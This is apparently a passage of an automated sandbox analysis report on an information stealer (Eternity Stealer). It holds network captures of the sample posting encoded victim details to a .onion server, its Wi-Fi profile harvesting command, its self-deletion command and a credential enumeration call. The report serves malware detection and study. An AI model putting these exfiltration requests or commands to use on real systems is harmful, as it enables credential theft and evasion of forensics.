                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 43 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 43 6f 6c 75 6d 62 69 61 22 2c 22 63 69 74 79 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 22 7a 69 70 22 3a 22 35 36 39 37 32 22 2c 22 6c 61 74 22 3a 33 38 2e 38 39 34 2c 22 6c 6f 6e 22 3a 2d 37 37 2e 30 33 36 35 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 41 53 31 37 34 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 7d
                                                                            Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"DC","regionName":"District of Columbia","city":"Washington","zip":"56972","lat":38.894,"lon":-77.0365,"timezone":"America/New_York","isp":"AS174","org":"DET Africa (Pty) LTD","as":"AS174 Cogent Communications","query":"102.165.48.43"}


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.2249166188.166.166.14292002308C:\Users\user\Desktop\Stealer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 29, 2024 10:31:40.006102085 CET300OUTPOST /stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM%3D&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw%3D%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg%3D%3D&t=MzI3 HTTP/1.1Host: izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onionContent-Length: 110240Expect: 100-continueConnection: Keep-Alive
                                                                            Data Raw:
                                                                            Data Ascii:
                                                                            Mar 29, 2024 10:31:40.726600885 CET50INHTTP/1.1 100 Continue
                                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 31 30 30 20 43 6f 6e 74 69 6e 75 65 0d 0a 0d 0a
                                                                            Data Ascii: HTTP/1.1 100 Continue
                                                                            Mar 29, 2024 10:31:47.469018936 CET174INHTTP/1.1 200 OK
                                                                            Server: Werkzeug/2.1.2 Python/3.11.0
                                                                            Date: Fri, 29 Mar 2024 09:31:46 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Content-Length: 2
                                                                            Connection: close
                                                                            Data Raw: 6f 6b
                                                                            Data Ascii: ok


                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.2249164149.154.167.994432308C:\Users\user\Desktop\Stealer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-03-29 09:30:49 UTC65OUTGET /tor_proxies HTTP/1.1
                                                                            Host: t.me
                                                                            Connection: Keep-Alive
                                                                            2024-03-29 09:30:50 UTC512INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Fri, 29 Mar 2024 09:30:50 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Content-Length: 10971
                                                                            Connection: close
                                                                            Set-Cookie: stel_ssid=5a68848a4a540c03a4_18393739983077253990; expires=Sat, 30 Mar 2024 09:30:50 GMT; path=/; samesite=None; secure; HttpOnly
                                                                            Pragma: no-cache
                                                                            Cache-control: no-store
                                                                            X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                            Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                            Strict-Transport-Security: max-age=35768000
                                                                            2024-03-29 09:30:50 UTC10971INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 74 6f 72 5f 70 72 6f 78 69 65 73 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70
                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @tor_proxies</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.p


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.2249165172.67.34.1704432308C:\Users\user\Desktop\Stealer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-03-29 09:30:50 UTC74OUTGET /raw/X2Ddjiv0 HTTP/1.1
                                                                            Host: pastebin.com
                                                                            Connection: Keep-Alive
                                                                            2024-03-29 09:30:51 UTC388INHTTP/1.1 200 OK
                                                                            Date: Fri, 29 Mar 2024 09:30:51 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-frame-options: DENY
                                                                            x-content-type-options: nosniff
                                                                            x-xss-protection: 1;mode=block
                                                                            cache-control: public, max-age=1801
                                                                            CF-Cache-Status: MISS
                                                                            Last-Modified: Fri, 29 Mar 2024 09:30:51 GMT
                                                                            Server: cloudflare
                                                                            CF-RAY: 86bed7f3cc0d8011-IAD
                                                                            2024-03-29 09:30:51 UTC186INData Raw: 62 34 0d 0a 31 38 38 2e 31 36 36 2e 31 36 36 2e 31 34 32 3a 39 32 30 30 0d 0a 31 35 39 2e 36 35 2e 31 35 36 2e 32 33 37 3a 31 34 30 30 0d 0a 31 33 30 2e 31 38 35 2e 38 33 2e 37 36 3a 39 31 35 31 0d 0a 35 2e 31 30 2e 32 32 38 2e 32 34 38 3a 39 30 35 30 0d 0a 34 37 2e 32 34 32 2e 36 39 2e 31 31 32 3a 39 31 35 31 0d 0a 31 30 33 2e 37 35 2e 31 39 37 2e 31 36 3a 33 31 31 36 0d 0a 33 35 2e 32 33 38 2e 31 36 31 2e 32 34 33 3a 39 30 37 30 0d 0a 31 38 2e 31 31 39 2e 34 30 2e 38 30 3a 39 30 35 30 0d 0a 38 2e 32 32 32 2e 31 36 38 2e 31 39 32 3a 39 30 30 37 0d 0a
                                                                            Data Ascii: b4188.166.166.142:9200159.65.156.237:1400130.185.83.76:91515.10.228.248:905047.242.69.112:9151103.75.197.16:311635.238.161.243:907018.119.40.80:90508.222.168.192:9007
                                                                            2024-03-29 09:30:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:10:30:44
                                                                            Start date:29/03/2024
                                                                            Path:C:\Users\user\Desktop\Stealer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\user\Desktop\Stealer.exe"
                                                                            Imagebase:0xad0000
                                                                            File size:344'064 bytes
                                                                            MD5 hash:495F88115EABED181E30727F2D2363D3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_EternityStealer, Description: Yara detected Eternity Stealer, Source: 00000000.00000000.333992859.0000000000AD2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:10:30:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                            Imagebase:0x4a570000
                                                                            File size:345'088 bytes
                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:4
                                                                            Start time:10:30:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\chcp.com
                                                                            Wow64 process (32bit):false
                                                                            Commandline:chcp 65001
                                                                            Imagebase:0xff240000
                                                                            File size:12'800 bytes
                                                                            MD5 hash:0C8C209151A45A4D7774E89C2F4079AA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:10:30:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\netsh.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:netsh wlan show profile
                                                                            Imagebase:0x1720000
                                                                            File size:87'040 bytes
                                                                            MD5 hash:637982A421D0133DCEAA0D1490D1DC9C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:6
                                                                            Start time:10:30:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\findstr.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:findstr All
                                                                            Imagebase:0xffad0000
                                                                            File size:71'168 bytes
                                                                            MD5 hash:6A2E9BBD516D064C925A9634A5632854
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:7
                                                                            Start time:10:31:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"
                                                                            Imagebase:0x4a0b0000
                                                                            File size:345'088 bytes
                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:9
                                                                            Start time:10:31:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\chcp.com
                                                                            Wow64 process (32bit):false
                                                                            Commandline:chcp 65001
                                                                            Imagebase:0xff780000
                                                                            File size:12'800 bytes
                                                                            MD5 hash:0C8C209151A45A4D7774E89C2F4079AA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:10
                                                                            Start time:10:31:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\PING.EXE
                                                                            Wow64 process (32bit):false
                                                                            Commandline:ping 127.0.0.1
                                                                            Imagebase:0xff1e0000
                                                                            File size:16'896 bytes
                                                                            MD5 hash:5FB30FE90736C7FC77DE637021B1CE7C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:25.5%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:6
                                                                              Total number of Limit Nodes:0
                                                                              execution_graph 23304 7fe93d90a21 23305 7fe93d90a7e 23304->23305 23307 7fe93d90a68 23304->23307 23308 7fe93d8aad0 23305->23308 23309 7fe93d90d00 CredEnumerateW 23308->23309 23311 7fe93d90dc8 23309->23311 23311->23307

                                                                              Executed Functions

                                                                              Function 000007FE93D998ED Relevance: 12.9, Strings: 8, Instructions: 2861COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 7fe93d998ed-7fe93d998f1 1 7fe93d998f6-7fe93d99905 0->1 2 7fe93d998f3-7fe93d998f4 0->2 3 7fe93d99908-7fe93d9991a 1->3 4 7fe93d99907 1->4 2->1 5 7fe93d9991c-7fe93d9997e 3->5 6 7fe93d998af-7fe93d998bb 3->6 4->3 7 7fe93d9999d-7fe93d99a0e 5->7 8 7fe93d99980-7fe93d99997 5->8 13 7fe93d998c5-7fe93d998ea 6->13 11 7fe93d99a2c-7fe93d99ae6 call 7fe93d81ae0 call 7fe93d81ae8 call 7fe93d83fe0 call 7fe93d840c0 7->11 12 7fe93d99a10-7fe93d99a26 7->12 8->7 25 7fe93d99ae8-7fe93d99afe 11->25 26 7fe93d99b04-7fe93d99bbe call 7fe93d81af0 call 7fe93d81af8 call 7fe93d83fe0 call 7fe93d840c0 11->26 12->11 25->26 36 7fe93d99bdc-7fe93d99c96 call 7fe93d81b00 call 7fe93d81b08 call 7fe93d83fe0 call 7fe93d840c0 26->36 37 7fe93d99bc0-7fe93d99bd6 26->37 47 7fe93d99c98-7fe93d99cae 36->47 48 7fe93d99cb4-7fe93d99d6e call 7fe93d81b10 call 7fe93d81b18 call 7fe93d83fe0 call 7fe93d840c0 36->48 37->36 47->48 58 7fe93d99d8c-7fe93d99e46 call 7fe93d81b20 call 7fe93d81b28 call 7fe93d83fe0 call 7fe93d840c0 48->58 59 7fe93d99d70-7fe93d99d86 48->59 69 7fe93d99e48-7fe93d99e5e 58->69 70 7fe93d99e64-7fe93d99f1e call 7fe93d81b30 call 7fe93d81b38 call 7fe93d83fe0 call 7fe93d840c0 58->70 59->58 69->70 80 7fe93d99f3c-7fe93d99ff6 call 7fe93d81b40 call 7fe93d81b48 call 7fe93d83fe0 call 7fe93d840c0 70->80 81 7fe93d99f20-7fe93d99f36 70->81 91 7fe93d99ff8-7fe93d9a00e 80->91 92 7fe93d9a014-7fe93d9a0ce call 7fe93d81b50 call 7fe93d81b58 call 7fe93d83fe0 call 7fe93d840c0 80->92 81->80 91->92 102 7fe93d9a0ec-7fe93d9a1a6 call 7fe93d81b60 call 7fe93d81b68 call 7fe93d83fe0 call 7fe93d840c0 92->102 103 7fe93d9a0d0-7fe93d9a0e6 92->103 113 7fe93d9a1a8-7fe93d9a1be 102->113 114 7fe93d9a1c4-7fe93d9a27e call 7fe93d81b70 call 7fe93d81b78 call 7fe93d83fe0 call 7fe93d840c0 102->114 103->102 113->114 124 7fe93d9a29c-7fe93d9a356 call 7fe93d81b80 call 7fe93d81b88 call 7fe93d83fe0 call 7fe93d840c0 114->124 125 7fe93d9a280-7fe93d9a296 114->125 135 7fe93d9a358-7fe93d9a36e 124->135 136 7fe93d9a374-7fe93d9a42e call 7fe93d81b90 call 7fe93d81b98 call 7fe93d83fe0 call 7fe93d840c0 124->136 125->124 135->136 146 7fe93d9a44c-7fe93d9a506 call 7fe93d81ba0 call 7fe93d81ba8 call 7fe93d83fe0 call 7fe93d840c0 136->146 147 7fe93d9a430-7fe93d9a446 136->147 157 7fe93d9a508-7fe93d9a51e 146->157 158 7fe93d9a524-7fe93d9a5de call 7fe93d81bb0 call 7fe93d81bb8 call 7fe93d83fe0 call 7fe93d840c0 146->158 147->146 157->158 168 7fe93d9a5fc-7fe93d9a6b6 call 7fe93d81bc0 call 7fe93d81bc8 call 7fe93d83fe0 call 7fe93d840c0 158->168 169 7fe93d9a5e0-7fe93d9a5f6 158->169 179 7fe93d9a6b8-7fe93d9a6ce 168->179 180 7fe93d9a6d4-7fe93d9a78e call 7fe93d81bd0 call 7fe93d81bd8 call 7fe93d83fe0 call 7fe93d840c0 168->180 169->168 179->180 190 7fe93d9a7ac-7fe93d9a866 call 7fe93d81be0 call 7fe93d81be8 call 7fe93d83fe0 call 7fe93d840c0 180->190 191 7fe93d9a790-7fe93d9a7a6 180->191 201 7fe93d9a868-7fe93d9a87e 190->201 202 7fe93d9a884-7fe93d9a93e call 7fe93d81bf0 call 7fe93d81bf8 call 7fe93d83fe0 call 7fe93d840c0 190->202 191->190 201->202 212 7fe93d9a95c-7fe93d9aa16 call 7fe93d81c00 call 7fe93d81c08 call 7fe93d83fe0 call 7fe93d840c0 202->212 213 7fe93d9a940-7fe93d9a956 202->213 223 7fe93d9aa18-7fe93d9aa2e 212->223 224 7fe93d9aa34-7fe93d9aaee call 7fe93d81c10 call 7fe93d81c18 call 7fe93d83fe0 call 7fe93d840c0 212->224 213->212 223->224 234 7fe93d9ab0c-7fe93d9abc6 call 7fe93d81410 call 7fe93d81418 call 7fe93d83fe0 call 7fe93d840c0 224->234 235 7fe93d9aaf0-7fe93d9ab06 224->235 245 7fe93d9abc8-7fe93d9abde 234->245 246 7fe93d9abe4-7fe93d9ac9e call 7fe93d81420 call 7fe93d81428 call 7fe93d83fe0 call 7fe93d840c0 234->246 235->234 245->246 256 7fe93d9acbc-7fe93d9ad76 call 7fe93d81430 call 7fe93d81438 call 7fe93d83fe0 call 7fe93d840c0 246->256 257 7fe93d9aca0-7fe93d9acb6 246->257 267 7fe93d9ad78-7fe93d9ad8e 256->267 268 7fe93d9ad94-7fe93d9ae4e call 7fe93d81440 call 7fe93d81448 call 7fe93d83fe0 call 7fe93d840c0 256->268 257->256 267->268 278 7fe93d9ae6c-7fe93d9af26 call 7fe93d81450 call 7fe93d81458 call 7fe93d83fe0 call 7fe93d840c0 268->278 279 7fe93d9ae50-7fe93d9ae66 268->279 289 7fe93d9af28-7fe93d9af3e 278->289 290 7fe93d9af44-7fe93d9affe call 7fe93d81460 call 7fe93d81468 call 7fe93d83fe0 call 7fe93d840c0 278->290 279->278 289->290 300 7fe93d9b01c-7fe93d9b0d6 call 7fe93d81470 call 7fe93d81478 call 7fe93d83fe0 call 7fe93d840c0 290->300 301 7fe93d9b000-7fe93d9b016 290->301 311 7fe93d9b0d8-7fe93d9b0ee 300->311 312 7fe93d9b0f4-7fe93d9b1ae call 7fe93d81480 call 7fe93d81488 call 7fe93d83fe0 call 7fe93d840c0 300->312 301->300 311->312 322 7fe93d9b1cc-7fe93d9b289 call 7fe93d81490 call 7fe93d81498 call 7fe93d83fe0 call 7fe93d840c0 312->322 323 7fe93d9b1b0-7fe93d9b1c6 312->323 333 7fe93d9b2aa-7fe93d9b367 call 7fe93d814a0 call 7fe93d814a8 call 7fe93d83fe0 call 7fe93d840c0 322->333 334 7fe93d9b28b-7fe93d9b2a4 322->334 323->322 344 7fe93d9b388-7fe93d9b445 call 7fe93d814b0 call 7fe93d814b8 call 7fe93d83fe0 call 7fe93d840c0 333->344 345 7fe93d9b369-7fe93d9b382 333->345 334->333 355 7fe93d9b466-7fe93d9b523 call 7fe93d814c0 call 7fe93d814c8 call 7fe93d83fe0 call 7fe93d840c0 344->355 356 7fe93d9b447-7fe93d9b460 344->356 345->344 366 7fe93d9b544-7fe93d9b601 call 7fe93d814d0 call 7fe93d814d8 call 7fe93d83fe0 call 7fe93d840c0 355->366 367 7fe93d9b525-7fe93d9b53e 355->367 356->355 377 7fe93d9b622-7fe93d9b6df call 7fe93d814e0 call 7fe93d814e8 call 7fe93d83fe0 call 7fe93d840c0 366->377 378 7fe93d9b603-7fe93d9b61c 366->378 367->366 388 7fe93d9b700-7fe93d9b7bd call 7fe93d814f0 call 7fe93d814f8 call 7fe93d83fe0 call 7fe93d840c0 377->388 389 7fe93d9b6e1-7fe93d9b6fa 377->389 378->377 399 7fe93d9b7de-7fe93d9b89b call 7fe93d81500 call 7fe93d81508 call 7fe93d83fe0 call 7fe93d840c0 388->399 400 7fe93d9b7bf-7fe93d9b7d8 388->400 389->388 410 7fe93d9b8bc-7fe93d9b979 call 7fe93d81510 call 7fe93d81518 call 7fe93d83fe0 call 7fe93d840c0 399->410 411 7fe93d9b89d-7fe93d9b8b6 399->411 400->399 421 7fe93d9b99a-7fe93d9ba57 call 7fe93d81520 call 7fe93d81528 call 7fe93d83fe0 call 7fe93d840c0 410->421 422 7fe93d9b97b-7fe93d9b994 410->422 411->410 432 7fe93d9ba78-7fe93d9bb35 call 7fe93d81530 call 7fe93d81538 call 7fe93d83fe0 call 7fe93d840c0 421->432 433 7fe93d9ba59-7fe93d9ba72 421->433 422->421 443 7fe93d9bb56-7fe93d9bc13 call 7fe93d81540 call 7fe93d81548 call 7fe93d83fe0 call 7fe93d840c0 432->443 444 7fe93d9bb37-7fe93d9bb50 432->444 433->432 454 7fe93d9bc34-7fe93d9bcf1 call 7fe93d81550 call 7fe93d81558 call 7fe93d83fe0 call 7fe93d840c0 443->454 455 7fe93d9bc15-7fe93d9bc2e 443->455 444->443 465 7fe93d9bd12-7fe93d9bdcf call 7fe93d81560 call 7fe93d81568 call 7fe93d83fe0 call 7fe93d840c0 454->465 466 7fe93d9bcf3-7fe93d9bd0c 454->466 455->454 476 7fe93d9bdf0-7fe93d9bead call 7fe93d81570 call 7fe93d81578 call 7fe93d83fe0 call 7fe93d840c0 465->476 477 7fe93d9bdd1-7fe93d9bdea 465->477 466->465 487 7fe93d9bece-7fe93d9bf8b call 7fe93d81580 call 7fe93d81588 call 7fe93d83fe0 call 7fe93d840c0 476->487 488 7fe93d9beaf-7fe93d9bec8 476->488 477->476 498 7fe93d9bfac-7fe93d9c069 call 7fe93d81590 call 7fe93d81598 call 7fe93d83fe0 call 7fe93d840c0 487->498 499 7fe93d9bf8d-7fe93d9bfa6 487->499 488->487 509 7fe93d9c08a-7fe93d9c147 call 7fe93d815a0 call 7fe93d815a8 call 7fe93d83fe0 call 7fe93d840c0 498->509 510 7fe93d9c06b-7fe93d9c084 498->510 499->498 520 7fe93d9c168-7fe93d9c225 call 7fe93d815b0 call 7fe93d815b8 call 7fe93d83fe0 call 7fe93d840c0 509->520 521 7fe93d9c149-7fe93d9c162 509->521 510->509 531 7fe93d9c246-7fe93d9c303 call 7fe93d815c0 call 7fe93d815c8 call 7fe93d83fe0 call 7fe93d840c0 520->531 532 7fe93d9c227-7fe93d9c240 520->532 521->520 542 7fe93d9c324-7fe93d9c3e1 call 7fe93d815d0 call 7fe93d815d8 call 7fe93d83fe0 call 7fe93d840c0 531->542 543 7fe93d9c305-7fe93d9c31e 531->543 532->531 553 7fe93d9c402-7fe93d9c4bf call 7fe93d815e0 call 7fe93d815e8 call 7fe93d83fe0 call 7fe93d840c0 542->553 554 7fe93d9c3e3-7fe93d9c3fc 542->554 543->542 564 7fe93d9c4e0-7fe93d9c4ec call 7fe93d815f0 call 7fe93d815f8 553->564 565 7fe93d9c4c1-7fe93d9c4da 553->565 554->553 569 7fe93d9c4f1-7fe93d9c59d call 7fe93d83fe0 call 7fe93d840c0 564->569 565->564 575 7fe93d9c5be-7fe93d9c67b call 7fe93d81600 call 7fe93d81608 call 7fe93d83fe0 call 7fe93d840c0 569->575 576 7fe93d9c59f-7fe93d9c5b8 569->576 586 7fe93d9c69c-7fe93d9c717 call 7fe93d81610 call 7fe93d81618 call 7fe93d83fe0 call 7fe93d840c0 575->586 587 7fe93d9c67d-7fe93d9c696 575->587 576->575 587->586
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6)f_$BrG6$Fim$JS86$b.WR$qLxJ$uWsy$+`
                                                                              • API String ID: 0-4240743467
                                                                              • Opcode ID: c8c6e94e7c4bb8b607d77dc60372651641cd40e204ea7ca62725704429448371
                                                                              • Instruction ID: 4af4dfb5fd038689e038a5c5d69306e955a60858fd2323c00e8f3a04db63decd
                                                                              • Opcode Fuzzy Hash: c8c6e94e7c4bb8b607d77dc60372651641cd40e204ea7ca62725704429448371
                                                                              • Instruction Fuzzy Hash: CC43E6B1E15A1D8FEBA0EB68CC55BD9B6F5FB98301F1041E5900CE3655EA78AEC08F41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93DA2784 Relevance: 5.7, Strings: 4, Instructions: 745COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 598 7fe93da2784-7fe93da279f 599 7fe93da27a1-7fe93da27ab 598->599 600 7fe93da27b4-7fe93da27d0 598->600 599->600 603 7fe93da27ad-7fe93da27b2 599->603 604 7fe93da27d3-7fe93da285b 600->604 603->604 606 7fe93da285d-7fe93da2871 604->606 607 7fe93da2874-7fe93da28df 604->607 606->607 609 7fe93da28f7-7fe93da29ab call 7fe93d82dc0 call 7fe93d82dc8 call 7fe93d83fe0 call 7fe93d840c0 607->609 610 7fe93da28e1-7fe93da28f4 607->610 620 7fe93da29ad-7fe93da29c0 609->620 621 7fe93da29c3-7fe93da2a77 call 7fe93d82dd0 call 7fe93d82dd8 call 7fe93d83fe0 call 7fe93d840c0 609->621 610->609 620->621 631 7fe93da2a79-7fe93da2a8c 621->631 632 7fe93da2a8f-7fe93da2b43 call 7fe93d82de0 call 7fe93d82de8 call 7fe93d83fe0 call 7fe93d840c0 621->632 631->632 642 7fe93da2b5b-7fe93da2c06 call 7fe93d82df0 call 7fe93d82df8 call 7fe93d83fe0 call 7fe93d840c0 632->642 643 7fe93da2b45-7fe93da2b58 632->643 654 7fe93da2c08-7fe93da2c1c 642->654 655 7fe93da2c1f-7fe93da2c8a 642->655 643->642 654->655 657 7fe93da2c8c-7fe93da2c9f 655->657 658 7fe93da2ca2-7fe93da2d63 call 7fe93d82e00 call 7fe93d82e08 call 7fe93d83fe0 call 7fe93d840c0 655->658 657->658 667 7fe93da2d7c-7fe93da2e06 call 7fe93d84a40 658->667 668 7fe93da2d65-7fe93da2d79 658->668 672 7fe93da2e08-7fe93da2e1b 667->672 673 7fe93da2e1e-7fe93da2edf call 7fe93d82e10 call 7fe93d82e18 call 7fe93d83fe0 call 7fe93d840c0 667->673 668->667 672->673 682 7fe93da2ef8-7fe93da2f82 call 7fe93d84a40 673->682 683 7fe93da2ee1-7fe93da2ef5 673->683 687 7fe93da2f9a-7fe93da305b call 7fe93d82e20 call 7fe93d82e28 call 7fe93d83fe0 call 7fe93d840c0 682->687 688 7fe93da2f84-7fe93da2f97 682->688 683->682 697 7fe93da305d-7fe93da3071 687->697 698 7fe93da3074-7fe93da30fe call 7fe93d84a40 687->698 688->687 697->698 702 7fe93da3116-7fe93da31dd call 7fe93d82e30 call 7fe93d82e38 call 7fe93d83fe0 call 7fe93d840c0 698->702 703 7fe93da3100-7fe93da3113 698->703 712 7fe93da31fc-7fe93da3213 call 7fe93d84a40 702->712 713 7fe93da31df-7fe93da31f6 702->713 703->702 715 7fe93da3218-7fe93da3250 712->715 713->712
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DH'$X3"Z${->w$,m
                                                                              • API String ID: 0-3306116339
                                                                              • Opcode ID: 5dcbb1583c168586154b59857d99a51465fb7eb6d229b3ee96e29d72442e9f0a
                                                                              • Instruction ID: dac3dd20e2827bbf81aea0835aafe3952576ffe09e08946169a651a49d3aeabc
                                                                              • Opcode Fuzzy Hash: 5dcbb1583c168586154b59857d99a51465fb7eb6d229b3ee96e29d72442e9f0a
                                                                              • Instruction Fuzzy Hash: 3562F8B0E046198FEBA4DB68C8957E9B7F1FF98301F1441AAD00DE7765EB34A9818F41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D961B0 Relevance: 5.7, Strings: 4, Instructions: 697COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
